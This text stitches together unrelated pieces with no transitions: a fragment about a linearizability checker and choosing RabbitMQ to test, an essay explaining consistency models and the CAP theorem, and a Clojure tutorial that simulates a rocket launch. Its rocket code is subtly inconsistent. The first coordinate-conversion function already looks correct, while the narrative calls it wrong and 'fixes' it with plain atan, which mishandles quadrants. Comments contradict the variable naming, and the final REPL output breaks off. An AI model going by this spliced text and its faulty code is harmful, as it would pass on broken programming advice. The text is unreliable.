The result is that Knossos can check 5-process, 150–200-element histories in a matter of minutes, not days–and it can do it on 48 cores.

cpus.png

There are several optimizations I haven’t made yet; for instance, detecting crashed processes and optimistically inserting a world in which that crashed process' operation never takes place. However, Knossos at this stage is more than capable of detecting linearization errors in real-world histories.

Proud of this technological terror I’d constructed, I consulted the small Moff Tarkin that lives in my head on what database to test next. “You would prefer another target? An open-source target? Then name the distributed system!”

alderaan.jpg

“RabbitMQ. They’re on RabbitMQ.”

Network partitions are going to happen. Switches, NICs, host hardware, operating systems, disks, virtualization layers, and language runtimes, not to mention program semantics themselves, all conspire to delay, drop, duplicate, or reorder our messages. In an uncertain world, we want our software to maintain some sense of intuitive correctness.

Well, obviously we want intuitive correctness. Do The Right Thing™! But what exactly is the right thing? How might we describe it? In this essay, we’ll take a tour of some “strong” consistency models, and see how they fit together.

Correctness

There are many ways to express an algorithm’s abstract behavior–but just for now, let’s say that a system is comprised of a state, and some operations that transform that state. As the system runs, it moves from state to state through some history of operations.

uniprocessor-history.jpg

For instance, our state might be a variable, and the operations on the state could be the writes to, and reads from, that variable. In this simple Ruby program, we write and read a variable several times, printing it to the screen to illustrate the reads.

x = "a"; puts x; puts x
x = "b"; puts x
x = "c"
x = "d"; puts x

We already have an intuitive model of this program’s correctness: it should print “aabd”. Why? Because each of the statements happens in order: first we write the value a, then read the value a, then read the value a, then write the value b, and so on.

Once we set a variable to some value, like a, reading it should return a, until we change the value again. Reading a variable returns the most recently written value. We call this kind of system–a variable with a single value–a register.

We’ve had this model drilled into our heads from the first day we started writing programs, so it feels like second nature–but this is not the only way variables could work. A variable could return any value for a read: a, d, or the moon. If that happened, we’d say the system was incorrect, because those operations don’t align with our model of how variables are supposed to work.

This hints at a definition of correctness for a system: given some rules which relate the operations and state, the history of operations in the system should always follow those rules. We call those rules a consistency model.

We phrased our rules for registers as simple English statements, but they could be arbitrarily complicated mathematical structures. “A read returns the value from two writes ago, plus three, except when the value is four, in which case the read may return either cat or dog” is a consistency model. As is “Every read always returns zero”. We could even say “There are no rules at all; every operation is permitted”. That’s the easiest consistency model to satisfy; every system obeys it trivially.

More formally, we say that a consistency model is the set of all allowed histories of operations. If we run a program and it goes through a sequence of operations in the allowed set, that particular execution is consistent. If the program screws up occasionally and goes through a history not in the consistency model, we say the history was inconsistent. If every possible execution falls into the allowed set, the system satisfies the model. We want real systems to satisfy “intuitively correct” consistency models, so that we can write predictable programs.
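To make the membership idea concrete, here’s a toy checker for the single-threaded register model above--a history, written as a sequence of [op value] pairs, is in the model iff every read returns the most recently written value. This is illustrative code, not a real checker:

```clojure
;; Toy membership test for the register consistency model.
(defn register-consistent?
  [history]
  (loop [value nil
         ops   history]
    (if-let [[[op v] & more] (seq ops)]
      (case op
        :write (recur v more)
        :read  (if (= v value)
                 (recur value more)
                 false))
      true)))

(register-consistent? [[:write "a"] [:read "a"] [:write "b"] [:read "b"]])
;; => true
(register-consistent? [[:write "a"] [:read "b"]])
;; => false
```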

Concurrent histories

Now imagine a concurrent program, like one written in Node.js or Erlang. There are multiple logical threads of control, which we term “processes”. If we run a concurrent program with two processes, each of which works with the same register, our earlier register invariant could be violated.

multiprocessor-history.jpg

There are two processes at work here: call them “top” and “bottom”. The top process tries to write a, read, read. The bottom process, meanwhile, tries to read, write b, read. Because the program is concurrent, the operations from these two processes could interleave in more than one order–so long as the operations for a single process happen in the order that process specifies. In this particular case, top writes a, bottom reads a, top reads a, bottom writes b, top reads b, and bottom reads b.

In this light, the concept of concurrency takes on a different shape. We might imagine every program as concurrent by default–when executed, operations could happen in any order. A thread, a process–in the logical sense, anyway–is a constraint over the history: operations belonging to the same thread must take place in order. Logical threads impose a partial order over the allowed operations.
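That partial order is easy to make concrete: the histories a two-process program may produce are exactly the interleavings of the two per-process histories that preserve each process’ own order. A small (and deliberately naive) generator:

```clojure
;; All interleavings of two single-process histories, preserving each
;; process' internal order--exactly the histories the partial order
;; allows.
(defn interleavings [xs ys]
  (cond (empty? xs) [ys]
        (empty? ys) [xs]
        :else
        (concat
          (map #(cons (first xs) %) (interleavings (rest xs) ys))
          (map #(cons (first ys) %) (interleavings xs (rest ys))))))

;; Two three-operation processes admit (6 choose 3) = 20 histories.
(count (interleavings [:write-a :read :read]
                      [:read :write-b :read]))
;; => 20
```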

Even with that order, our register invariant–from the point of view of an individual process–no longer holds. The process on top wrote a, read a, then read b–which is not the value it wrote. We must relax our consistency model to usefully describe concurrency. Now, a process is allowed to read the most recently written value from any process, not just itself. The register becomes a place of coordination between two processes; they share state.

Light cones

lightcone-history.jpg

However, this is not the full story: in almost every real-world system, processes are distant from each other. An uncached value in memory, for instance, is likely on a DIMM thirty centimeters away from the CPU. It takes light over a full nanosecond to travel that distance–and real memory accesses are much slower. A value on a computer in a different datacenter could be thousands of kilometers–hundreds of milliseconds–away. We just can’t send information there any faster; physics, thus far, forbids it.

This means our operations are no longer instantaneous. Some of them might be so fast as to be negligible, but in full generality, operations take time. We invoke a write of a variable; the write travels to memory, or another computer, or the moon; the memory changes state; a confirmation travels back; and then we know the operation took place.

concurrent-read.jpg

The delay in sending messages from one place to another implies ambiguity in the history of operations. If messages travel faster or slower, they could take place in unexpected orders. Here, the bottom process invokes a read when the value is a. While the read is in flight, the top process writes b–and by happenstance, its write arrives before the read. The bottom process finally completes its read and finds b, not a.

This history violates our concurrent register consistency model. The bottom process did not read the current value at the time it invoked the read. We might try to use the completion time, rather than the invocation time, as the “true time” of the operation, but this fails by symmetry as well; if the read arrives before the write, the process would receive a when the current value is b.

In a distributed system–one in which it takes time for an operation to take place–we must relax our consistency model again; allowing these ambiguous orders to happen.

How far must we go? Must we allow all orderings? Or can we still impose some sanity on the world?

Linearizability

finite-concurrency-bounds.jpg

On careful examination, there are some bounds on the order of events. We can’t send a message back in time, so the earliest a message could reach the source of truth is, well, instantly. An operation cannot take effect before its invocation.

Likewise, the message informing the process that its operation completed cannot travel back in time, which means that no operation may take effect after its completion.

If we assume that there is a single global state that each process talks to; if we assume that operations on that state take place atomically, without stepping on each other’s toes; then we can rule out a great many histories indeed. We know that each operation appears to take effect atomically at some point between its invocation and completion.

We call this consistency model linearizability; because although operations are concurrent, and take time, there is some place–or the appearance of a place–where every operation happens in a nice linear order.

linearizability-complete-visibility.jpg

The “single global state” doesn’t have to be a single node; nor do operations actually have to be atomic. The state could be split across many machines, or take place in multiple steps–so long as the external history, from the point of view of the processes, appears equivalent to an atomic, single point of state. Often, a linearizable system is made up of smaller coordinating processes, each of which is itself linearizable; and those processes are made up of carefully coordinated smaller processes, and so on, down to linearizable operations provided by the hardware.

Linearizability has powerful consequences. Once an operation is complete, everyone must see it–or some later state. We know this to be true because each operation must take place before its completion time, and any operation invoked subsequently must take place after the invocation–and by extension, after the original operation itself. Once we successfully write b, every subsequently invoked read must see b–or some later value, if more writes occur.

We can use the atomic constraint of linearizability to mutate state safely. We can define an operation like compare-and-set, in which we set the value of a register to a new value if, and only if, the register currently has some other value. We can use compare-and-set as the basis for mutexes, semaphores, channels, counters, lists, sets, maps, trees–all kinds of shared data structures become available. Linearizability guarantees us the safe interleaving of changes.
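Clojure’s atoms expose compare-and-set! directly, so a lock-free counter falls out in a few lines. This is a sketch of the retry-loop idea, not a production counter (swap! packages the same loop for you):

```clojure
;; A counter built on compare-and-set!: read the current value, try
;; to CAS in value + 1, and retry if another thread won the race.
(def register (atom 0))

(defn increment! [r]
  (loop []
    (let [v @r]
      (or (compare-and-set! r v (inc v))
          (recur)))))

;; Ten threads, each incrementing 100 times: no lost updates.
(dorun (apply pcalls (repeat 10 #(dotimes [_ 100] (increment! register)))))
@register
;; => 1000
```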

Moreover, linearizability’s time bounds guarantee that those changes will be visible to other participants after the operation completes. Hence, linearizability prohibits stale reads. Each read will see some current state between invocation and completion; but not a state prior to the read. It also prohibits non-monotonic reads–in which one reads a new value, then an old one.

Because of these strong constraints, linearizable systems are easier to reason about–which is why they’re chosen as the basis for many concurrent programming constructs. All variables in Javascript are (independently) linearizable; as are volatile variables in Java, atoms in Clojure, or individual processes in Erlang. Most languages have mutexes and semaphores; these are linearizable too. Strong assumptions yield strong guarantees.

But what happens if we can’t satisfy those assumptions?

Sequential consistency

sequential-history.jpg

If we allow processes to skew in time, such that their operations can take effect before invocation, or after completion–but retain the constraint that operations from any given process must take place in that process' order–we get a weaker flavor of consistency: sequential consistency.

Sequential consistency allows more histories than linearizability–but it’s still a useful model: one that we use every day. When a user uploads a video to YouTube, for instance, YouTube puts that video into a queue for processing, then returns a web page for the video right away. We can’t actually watch the video at that point; the video upload takes effect a few minutes later, when it’s been fully processed. Queues remove synchronous behavior while (depending on the queue) preserving order.

Many caches also behave like sequentially consistent systems. If I write a tweet on Twitter, or post to Facebook, it takes time to percolate through layers of caching systems. Different users will see my message at different times–but each user will see my operations in order. Once seen, a post shouldn’t disappear. If I write multiple comments, they’ll become visible sequentially, not out of order.

Causal consistency

We don’t have to enforce the order of every operation from a process. Perhaps, only causally related operations must occur in order. We might say, for instance, that all comments on a blog post must appear in the same order for everyone, and insist that any reply be visible to a process only after the post it replies to is visible. If we encode those causal relationships like “I depend on operation X” as an explicit part of each operation, the database can delay making operations visible until it has all the operation’s dependencies.

This is weaker than ordering every operation from the same process–operations from the same process with independent causal chains could execute in any relative order–but prevents many unintuitive behaviors.

Serializable consistency

serializable-history.jpg

If we say that the history of operations is equivalent to one that took place in some single atomic order–but say nothing about the invocation and completion times–we obtain a consistency model known as serializability. This model is both much stronger and much weaker than you’d expect.

Serializability is weak, in the sense that it permits many types of histories, because it places no bounds on time or order. In the diagram to the right, it’s as if messages could be sent arbitrarily far into the past or future, that causal lines are allowed to cross. In a serializable database, a transaction like read x is always allowed to execute at time 0, when x had not yet been initialized. Or it might be delayed infinitely far into the future! The transaction write 2 to x could execute right now, or it could be delayed until the end of time, never appearing to occur.

For instance, in a serializable system, the program

x = 1
x = x + 1
puts x

is allowed to print nil, 1, or 2, because the operations can take place in any order. This is a surprisingly weak constraint! Here, we assume that each line represents a single operation and that all operations succeed.

On the other hand, serializability is strong, in the sense that it prohibits large classes of histories, because it demands a linear order. The program

print x if x = 3
x = 1 if x = nil
x = 2 if x = 1
x = 3 if x = 2

can only be ordered in one way. It doesn’t happen in the same order we wrote, but it will reliably change x from nil -> 1 -> 2 -> 3, and finally print 3.

Because serializability allows arbitrary reordering of operations (so long as the order appears atomic), it is not particularly useful in real applications. Most databases which claim to provide serializability actually provide strong serializability, which has the same time bounds as linearizability. To complicate matters further, what most SQL databases term the SERIALIZABLE consistency level actually means something weaker, like repeatable read, cursor stability, or snapshot isolation.

Consistency comes with costs

We’ve said that “weak” consistency models allow more histories than “strong” consistency models. Linearizability, for example, guarantees that operations take place between the invocation and completion times. However, imposing order requires coordination. Speaking loosely, the more histories we exclude, the more careful and communicative the participants in a system must be.

You may have heard of the CAP theorem, which states that given consistency, availability, and partition tolerance, any given system may guarantee at most two of those properties. While Eric Brewer’s CAP conjecture was phrased in these informal terms, the CAP theorem has very precise definitions:

  1. Consistency means linearizability, and in particular, a linearizable register. Registers are equivalent to other systems, including sets, lists, maps, relational databases, and so on, so the theorem can be extended to cover all kinds of linearizable systems.

  2. Availability means that every request to a non-failing node must complete successfully. Since network partitions are allowed to last arbitrarily long, this means that nodes cannot simply defer responding until after the partition heals.

  3. Partition tolerance means that partitions can happen. Providing consistency and availability when the network is reliable is easy. Providing both when the network is not reliable is provably impossible. If your network is not perfectly reliable–and it isn’t–you cannot choose CA. This means that all practical distributed systems on commodity hardware can guarantee, at maximum, either AP or CP.

family-tree.jpg

“Hang on!” you might exclaim. “Linearizability is not the end-all-be-all of consistency models! I could work around the CAP theorem by providing sequential consistency, or serializability, or snapshot isolation!”

This is true; the CAP theorem only says that we cannot build totally available linearizable systems. The problem is that we have other proofs which tell us that you cannot build totally available systems with sequential, serializable, repeatable read, snapshot isolation, or cursor stability–or any models stronger than those. In this map from Peter Bailis' HAT not CAP paper, models shaded in red cannot be fully available.

If we relax our notion of availability, such that client nodes must always talk to the same server, some types of consistency become achievable. We can provide causal consistency, PRAM, and read-your-writes consistency.

If we demand total availability, then we can provide monotonic reads, monotonic writes, read committed, monotonic atomic view, and so on. These are the consistency models provided by distributed stores like Riak and Cassandra, or ANSI SQL databases on the lower isolation settings. These consistency models don’t have linear orders like the diagrams we’ve drawn before; instead, they provide partial orders which come together in a patchwork or web. The orders are partial because they admit a broader class of histories.

A hybrid approach

weak-not-unsafe.jpg

Some algorithms depend on linearizability for safety. If we want to build a distributed lock service, for instance, linearizability is required; without hard time boundaries, we could hold a lock from the future or from the past. On the other hand, many algorithms don’t need linearizability. Eventually consistent sets, lists, trees, and maps, for instance, can be safely expressed as CRDTs even in “weak” consistency models.

Stronger consistency models also tend to require more coordination–more messages back and forth–to ensure their operations occur in the correct order. Not only are they less available, but they can also impose higher latency constraints. This is why modern CPU memory models are not linearizable by default–unless you explicitly say so, modern CPUs will reorder memory operations relative to other cores, or worse. While more difficult to reason about, the performance benefits are phenomenal. Geographically distributed systems, with hundreds of milliseconds of latency between datacenters, often make similar tradeoffs.

So in practice, we use hybrid data storage, mixing databases with varying consistency models to achieve our redundancy, availability, performance, and safety objectives. “Weaker” consistency models wherever possible, for availability and performance. “Stronger” consistency models where necessary, because the algorithm being expressed demands a stricter ordering of operations. You can write huge volumes of data to S3, Riak or Cassandra, for instance, then write a pointer to that data, linearizably, to Postgres, Zookeeper or Etcd. Some databases admit multiple consistency models, like tunable isolation levels in relational databases, or Cassandra and Riak’s linearizable transactions, which can help cut down on the number of systems in play. Bottom line, though: anyone who says their consistency model is the only right choice is likely trying to sell something. You can’t have your cake and eat it too.

Armed with a more nuanced understanding of consistency models, I’d like to talk about how we go about verifying the correctness of a linearizable system. In the next Jepsen post, we’ll discuss the linearizability checker I’ve built for testing distributed systems: Knossos.

For a more formal definition of these models, try Dziuma, Fatourou, and Kanellou’s Survey on consistency conditions

Previously: Logistics

Until this point in the book, we’ve dealt primarily in specific details: what an expression is, how math works, which functions apply to different data structures, and where code lives. But programming, like speaking a language, painting landscapes, or designing turbines, is about more than the nuts and bolts of the trade. It’s knowing how to combine those parts into a cohesive whole–and this is a skill which is difficult to describe formally. In this part of the book, I’d like to work with you on an integrative tour of one particular problem: modeling a rocket in flight.

We’re going to reinforce our concrete knowledge of the standard library by using maps, sequences, and math functions together. At the same time, we’re going to practice how to represent a complex system; decomposing a problem into smaller parts, naming functions and variables, and writing tests.

So you want to go to space

First, we need a representation of a craft. The obvious properties for a rocket are its dry mass (how much it weighs without fuel), fuel mass, position, velocity, and time. We’ll create a new file in our scratch project–src/scratch/rocket.clj–to talk about spacecraft.

For starters, let’s pattern our craft after an Atlas V launch vehicle. We’ll represent everything in SI units–kilograms, meters, newtons, etc. The Atlas V carries 284,450 kg (627,105 lbs) of LOX/RP-1 fuel; out of a total mass of 334,500 kg, that leaves only 50,050 kg of mass which isn’t fuel. It develops 4152 kilonewtons of thrust and runs for 253 seconds, with a specific impulse (effectively, exhaust velocity) of 3.05 kilometers/sec. Real rockets develop varying amounts of thrust depending on the atmosphere, but we’ll pretend thrust is constant in our simulation.

(defn atlas-v
  []
  {:dry-mass      50050
   :fuel-mass     284450
   :time          0
   :isp           3050
   :max-fuel-rate (/ 284450 253)
   :max-thrust    4.152e6})

How heavy is the craft?

(defn mass
  "The total mass of a craft."
  [craft]
  (+ (:dry-mass craft) (:fuel-mass craft)))

What about the position and velocity? We could represent them in Cartesian coordinates–x, y, and z–or we could choose spherical coordinates: a radius from the planet’s center, an angle from the pole, and an angle from 0 degrees longitude. I’ve got a hunch that spherical coordinates will be easier for position, but accelerating the craft will be simplest in x, y, and z terms. The center of the planet is a natural choice for the coordinate system’s origin (0, 0, 0). We’ll choose z along the north pole, and x and y in the plane of the equator.

Let’s define a space center where we launch from–let’s say it’s initially on the equator at y=0. To figure out the x coordinate, we’ll need to know how far the space center is from the center of the earth. The earth’s equatorial radius is ~6378 kilometers.

(def earth-equatorial-radius
  "Radius of the earth, in meters"
  6378137)

How fast is the surface moving? Well the earth’s day is 86,400 seconds long,

(def earth-day
  "Length of an earth day, in seconds."
  86400)

which means a given point on the equator has to go 2 * pi * equatorial radius meters in earth-day seconds:

(def earth-equatorial-speed
  "How fast points on the equator move, relative to the center of the
  earth, in meters/sec."
  (/ (* 2 Math/PI earth-equatorial-radius)
     earth-day))

So our space center is on the equator (z=0), at y=0 by choice, which means x is the equatorial radius. Since the earth is spinning, the space center is moving at earth-equatorial-speed in the y direction–and not changing at all in x or z.

(def initial-space-center
  "The initial position and velocity of the launch facility"
  {:time     0
   :position {:x earth-equatorial-radius
              :y 0
              :z 0}
   :velocity {:x 0
              :y earth-equatorial-speed
              :z 0}})

:position and :velocity are both vectors, in the sense that they describe a position, or a direction, in terms of x, y, and z components. This is a different kind of vector than a Clojure vector, like [1 2 3]. We’re actually representing these logical vectors as Clojure maps, with :x, :y, and :z keys, corresponding to the distance along the x, y, and z directions, from the center of the earth. Throughout this chapter, I’ll mainly use the term coordinates to talk about these structures, to avoid confusion with Clojure vectors.

Now let’s create a function which positions our craft on the launchpad at time 0. We’ll just merge the spacecraft map with the initial space center, overwriting the craft’s time and space coordinates.

(defn prepare
  "Prepares a craft for launch from an equatorial space center."
  [craft]
  (merge craft initial-space-center))
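Assuming the definitions so far (atlas-v, initial-space-center, and prepare), putting a craft on the pad looks like:

```clojure
;; A craft on the pad inherits the pad's position and velocity:
;; sitting at the equatorial radius along x, moving eastward (+y)
;; with the earth's rotation at roughly 464 meters/sec.
(def craft (prepare (atlas-v)))

(:position craft)  ;; => {:x 6378137, :y 0, :z 0}
(:time craft)      ;; => 0
;; (:velocity craft) is {:x 0, :y 463.83..., :z 0}
```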

Forces

Gravity continually pulls the spacecraft towards the center of the Earth, accelerating it by 9.8 meters/second every second. To figure out what direction is towards the Earth, we’ll need the angles of a spherical coordinate system. We’ll use the trigonometric functions from java.lang.Math.

(defn magnitude
  "What's the radius of a given set of cartesian coordinates?"
  [c]
  ; By the Pythagorean theorem...
  (Math/sqrt (+ (Math/pow (:x c) 2)
                (Math/pow (:y c) 2)
                (Math/pow (:z c) 2))))

(defn cartesian->spherical
  "Converts a map of Cartesian coordinates :x, :y, and :z to spherical
  coordinates :r, :theta, and :phi."
  [c]
  (let [r (magnitude c)]
    {:r     r
     :theta (Math/acos (/ (:z c) r))
     ; atan2 picks the correct quadrant for phi, unlike plain atan.
     :phi   (Math/atan2 (:y c) (:x c))}))

(defn spherical->cartesian
  "Converts spherical to Cartesian coordinates."
  [c]
  {:x (* (:r c) (Math/sin (:theta c)) (Math/cos (:phi c)))
   :y (* (:r c) (Math/sin (:theta c)) (Math/sin (:phi c)))
   ; z depends on the angle from the pole, theta--not phi.
   :z (* (:r c) (Math/cos (:theta c)))})

With those angles in mind, computing the gravitational acceleration is easy. We just take the spherical coordinates of the spacecraft, and replace the radius with the total force due to gravity. Then we can transform that spherical force back into Cartesian coordinates.

(def g "Acceleration of gravity in meters/s^2" -9.8)

(defn gravity-force
  "The force vector, each component in Newtons, due to gravity."
  [craft]
  ; Since force is mass times acceleration...
  (let [total-force (* g (mass craft))]
    (-> craft
        ; Now we'll take the craft's position
        :position
        ; in spherical coordinates,
        cartesian->spherical
        ; replace the radius with the gravitational force...
        (assoc :r total-force)
        ; and transform back to Cartesian-land
        spherical->cartesian)))

Rockets produce thrust by consuming fuel. Let’s say the fuel consumption is always the maximum, until we run out:

(defn fuel-rate
  "How fast is fuel, in kilograms/second, consumed by the craft?"
  [craft]
  (if (pos? (:fuel-mass craft))
    (:max-fuel-rate craft)
    0))

Now that we know how much fuel is being consumed, we can compute the force the rocket engine develops. That force is simply the mass consumed per second times the exhaust velocity–which is the specific impulse :isp. We’ll ignore atmospheric effects.

(defn thrust
  "How much force, in newtons, do the craft's rocket engines exert?"
  [craft]
  (* (fuel-rate craft) (:isp craft)))

Cool. What about the direction of thrust? Just for grins, let’s keep the rocket pointing entirely along the x axis.

(defn engine-force
  "The force vector, each component in Newtons, due to the rocket engine."
  [craft]
  (let [t (thrust craft)]
    {:x t
     :y 0
     :z 0}))

The total force on a craft is just the sum of gravity and thrust. To sum these maps together, we’ll need a way to sum the x, y, and z components independently. Clojure’s merge-with function combines common fields in maps using a function, so this is surprisingly straightforward.
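For instance, at the REPL (a throwaway example with made-up force components):

```clojure
user=> (merge-with + {:x 1 :y 2 :z 3} {:x 10 :y 20 :z 30})
{:x 11, :y 22, :z 33}
```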

(defn total-force
  "Total force on a craft."
  [craft]
  (merge-with + (engine-force craft)
                (gravity-force craft)))

The acceleration of a craft, by Newton’s second law, is force divided by mass. This one’s a little trickier: given {:x 1 :y 2 :z 4} we want to apply a function–say, multiplication by a factor–to each number. Since maps are sequences of key/value pairs…

user=> (seq {:x 1 :y 2 :z 3}) ([:z 3] [:y 2] [:x 1])

… and we can build up new maps out of key/value pairs using into

user=> (into {} [[:x 4] [:y 5]]) {:x 4, :y 5}

… we can write a function map-values which works like map, but affects the values of a map data structure.

(defn map-values
  "Applies f to every value in the map m."
  [f m]
  (into {}
        (map (fn [pair]
               [(key pair) (f (val pair))])
             m)))

And that allows us to define a scale function which scales a set of coordinates by some factor:

(defn scale
  "Multiplies a map of x, y, and z coordinates by the given factor."
  [factor coordinates]
  (map-values (partial * factor) coordinates))

What’s that partial thing? It’s a function which takes a function, and some arguments, and returns a new function. What does the new function do? It calls the original function, with the arguments passed to partial, followed by any arguments passed to the new function. In short, (partial * factor) returns a function that takes any number, and multiplies it by factor.
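For example (the numbers here are arbitrary):

```clojure
user=> ((partial * 3) 7)
21
user=> (map (partial * 10) [1 2 3])
(10 20 30)
```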

So to divide each component of the force vector by the mass of the craft:

(defn acceleration
  "Total acceleration of a craft."
  [craft]
  (let [m (mass craft)]
    (scale (/ m) (total-force craft))))

Note that (/ m) returns 1/m. Our scale function can do double-duty as both multiplication and division.
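At the REPL (assuming the scale function defined above is loaded; the numbers are arbitrary):

```clojure
user=> (/ 4)
1/4
user=> (scale (/ 2) {:x 4 :y 6 :z 8})
{:x 2, :y 3, :z 4}
```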

With the acceleration and fuel consumption all figured out, we’re ready to apply those changes over time. We’ll write a function which takes the rocket at a particular time, and returns a version of it dt seconds later.

(defn step [craft dt]
  (assoc craft
         ; Time advances by dt seconds
         :t         (+ dt (:t craft))
         ; We burn some fuel
         :fuel-mass (- (:fuel-mass craft) (* dt (fuel-rate craft)))
         ; Our position changes based on our velocity
         :position  (merge-with + (:position craft)
                                  (scale dt (:velocity craft)))
         ; And our velocity changes based on our acceleration
         :velocity  (merge-with + (:velocity craft)
                                  (scale dt (acceleration craft)))))

OK. Let’s save the rocket.clj file, load that code into the REPL, and fire it up.

user=> (use 'scratch.rocket :reload)
nil

use is like a shorthand for require with :refer :all. We’re passing :reload because we want the REPL to re-read the file. Notice that in ns declarations, the namespace name scratch.rocket is unquoted–but when we call use or require at the REPL, we quote the namespace name.

user=> (atlas-v)
{:dry-mass 50050, :fuel-mass 284450, :time 0, :isp 3050, :max-fuel-rate 284450/253, :max-thrust 4152000.0}

Launch

Let’s prepare the rocket. We’ll use pprint to print it in a more readable form.

user=> (-> (atlas-v) prepare pprint)
{:velocity {:x 0, :y 463.8312116386399, :z 0},
 :position {:x 6378137, :y 0, :z 0},
 :dry-mass 50050,
 :fuel-mass 284450,
 :time 0,
 :isp 3050,
 :max-fuel-rate 284450/253,
 :max-thrust 4152000.0}

Great; there it is on the launchpad. Wow, even “standing still”, it’s moving at 463 meters/sec because of the earth’s rotation! That means you and I are flying through space at almost half a kilometer every second! Let’s step forward one second in time.

user=> (-> (atlas-v) prepare (step 1) pprint)

NullPointerException   clojure.lang.Numbers.ops (Numbers.java:942)

In evaluating this expression, Clojure reached a point where it could not continue, and aborted execution. We call this error an exception, and the process of aborting, throwing the exception. Clojure backs up to the function which called the throwing function, then the function which called that function, and so on, all the way to the top-level expression. The REPL finally intercepts the exception, prints an error to the console, and stashes the exception object in the special variable *e.

In this case, we know that the exception in question was a NullPointerException, which occurs when a function receives nil unexpectedly. This one came from clojure.lang.Numbers.ops, which suggests some sort of math was involved. Let’s use pst to find out where it came from.

user=> (pst *e)
NullPointerException
	clojure.lang.Numbers.ops (Numbers.java:942)
	clojure.lang.Numbers.add (Numbers.java:126)
	scratch.rocket/step (rocket.clj:125)
	user/eval1478 (NO_SOURCE_FILE:1)
	clojure.lang.Compiler.eval (Compiler.java:6619)
	clojure.lang.Compiler.eval (Compiler.java:6582)
	clojure.core/eval (core.clj:2852)
	clojure.main/repl/read-eval-print--6588/fn--6591 (main.clj:259)
	clojure.main/repl/read-eval-print--6588 (main.clj:259)
	clojure.main/repl/fn--6597 (main.clj:277)
	clojure.main/repl (main.clj:277)
	clojure.tools.nrepl.middleware.interruptible-eval/evaluate/fn--589 (interruptible_eval.clj:56)

This is called a stack trace: the stack is the context of the program at each function call. It traces the path the computer took in evaluating the expression, from the bottom to the top. At the bottom is the REPL, and Clojure compiler. Our code begins at user/eval1478–that’s the compiler’s name for the expression we just typed. That function called scratch.rocket/step, which in turn called Numbers.add, and that called Numbers.ops. Let’s start by looking at the last function we wrote before calling into Clojure’s standard library: the step function, in rocket.clj, on line 125.

123     (assoc craft
124            ; Time advances by dt seconds
125            :t         (+ dt (:t craft))

Ah; we named the time field :time earlier, not :t. Let’s replace :t with :time, save the file, and reload.

user=> (use 'scratch.rocket :reload)
nil
user=> (-> (atlas-v) prepare (step 1) pprint)
{:velocity {:x 0.45154055666826215, :y 463.8312116386399, :z -9.8},
 :position {:x 6378137, :y 463.8312116386399, :z 0},
 :dry-mass 50050,
 :fuel-mass 71681400/253,
 :time 1,
 :isp 3050,
 :max-fuel-rate 284450/253,
 :max-thrust 4152000.0}

Look at that! Our x position is unchanged (because our x velocity was zero), but our velocity has shifted. We’re now moving… wait, -9.8 meters per second south? That can’t be right. Gravity points down, not sideways. Something must be wrong with our spherical coordinate system. Let’s write a test in test/scratch/rocket_test.clj to explore.

(ns scratch.rocket-test
  (:require [clojure.test :refer :all]
            [scratch.rocket :refer :all]))

(deftest spherical-coordinate-test
  (let [pos {:x 1 :y 2 :z 3}]
    (testing "roundtrip"
      (is (= pos (-> pos cartesian->spherical spherical->cartesian))))))

aphyr@waterhouse:~/scratch$ lein test

lein test scratch.core-test

lein test scratch.rocket-test

lein test :only scratch.rocket-test/spherical-coordinate-test

FAIL in (spherical-coordinate-test) (rocket_test.clj:8)
roundtrip
expected: (= pos (-> pos cartesian->spherical spherical->cartesian))
  actual: (not (= {:z 3, :y 2, :x 1}
                  {:x 1.0, :y 1.9999999999999996, :z 1.6733200530681513}))

Ran 2 tests containing 4 assertions.
1 failures, 0 errors.
Tests failed.

Definitely wrong. Looks like something to do with the z coordinate, since x and y look OK. Let’s try testing a point on the north pole:

(deftest spherical-coordinate-test
  (testing "spherical->cartesian"
    (is (= (spherical->cartesian {:r 2 :phi 0 :theta 0})
           {:x 0.0 :y 0.0 :z 2.0})))

  (testing "roundtrip"
    (let [pos {:x 1.0 :y 2.0 :z 3.0}]
      (is (= pos (-> pos cartesian->spherical spherical->cartesian))))))

That checks out OK. Let’s try some values in the REPL.

user=> (cartesian->spherical {:x 0.00001 :y 0.00001 :z 2.0})
{:r 2.00000000005, :theta 7.071068104411588E-6, :phi 0.7853981633974483}
user=> (cartesian->spherical {:x 1 :y 2 :z 3})
{:r 3.7416573867739413, :theta 0.6405223126794245, :phi 1.1071487177940904}
user=> (spherical->cartesian (cartesian->spherical {:x 1 :y 2 :z 3}))
{:x 1.0, :y 1.9999999999999996, :z 1.6733200530681513}
user=> (cartesian->spherical {:x 1 :y 2 :z 0})
{:r 2.23606797749979, :theta 1.5707963267948966, :phi 1.1071487177940904}
user=> (cartesian->spherical {:x 1 :y 1 :z 0})
{:r 1.4142135623730951, :theta 1.5707963267948966, :phi 0.7853981633974483}

Oh, wait, that looks odd. {:x 1 :y 1 :z 0} is on the equator: phi–the angle from the pole–should be pi/2 or ~1.57, and theta–the angle around the equator–should be pi/4 or 0.78. Those coordinates are reversed! Double-checking our formulas with Wolfram MathWorld shows that we mixed up phi and theta! Let’s redefine cartesian->spherical correctly.

(defn cartesian->spherical
  "Converts a map of Cartesian coordinates :x, :y, and :z to spherical
  coordinates :r, :theta, and :phi."
  [c]
  (let [r (Math/sqrt (+ (Math/pow (:x c) 2)
                        (Math/pow (:y c) 2)
                        (Math/pow (:z c) 2)))]
    {:r     r
     :phi   (Math/acos (/ (:z c) r))
     :theta (Math/atan (/ (:y c) (:x c)))}))

aphyr@waterhouse:~/scratch$ lein test

lein test scratch.core-test

lein test scratch.rocket-test

Ran 2 tests containing 5 assertions.
0 failures, 0 errors.

Great. Now let’s check the rocket trajectory again.

user=> (-> (atlas-v) prepare (step 1) pprint)
{:velocity {:x 0.45154055666826204, :y 463.8312116386399, :z -6.000769315822031E-16},
 :position {:x 6378137, :y 463.8312116386399, :z 0},
 :dry-mass 50050,
 :fuel-mass 71681400/253,
 :time 1,
 :isp 3050,
 :max-fuel-rate 284450/253,
 :max-thrust 4152000.0}

This time, our velocity is increasing in the +x direction, at half a meter per second. We have liftoff!

Flight

We have a function that can move the rocket forward by one small step of time, but we’d like to understand the rocket’s trajectory as a whole; to see all positions it will take. We’ll use iterate to construct a lazy, infinite sequence of rocket states, each one constructed by stepping forward from the last.

(defn trajectory
  "Returns all future states of the craft, at dt-second intervals."
  [dt craft]
  (iterate #(step % dt) craft))

user=> (->> (atlas-v) prepare (trajectory 1) (take 3) pprint)
({:velocity {:x 0, :y 463.8312116386399, :z 0},
  :position {:x 6378137, :y 0, :z 0},
  :dry-mass 50050,
  :fuel-mass 284450,
  :time 0,
  :isp 3050,
  :max-fuel-rate 284450/253,
  :max-thrust 4152000.0}
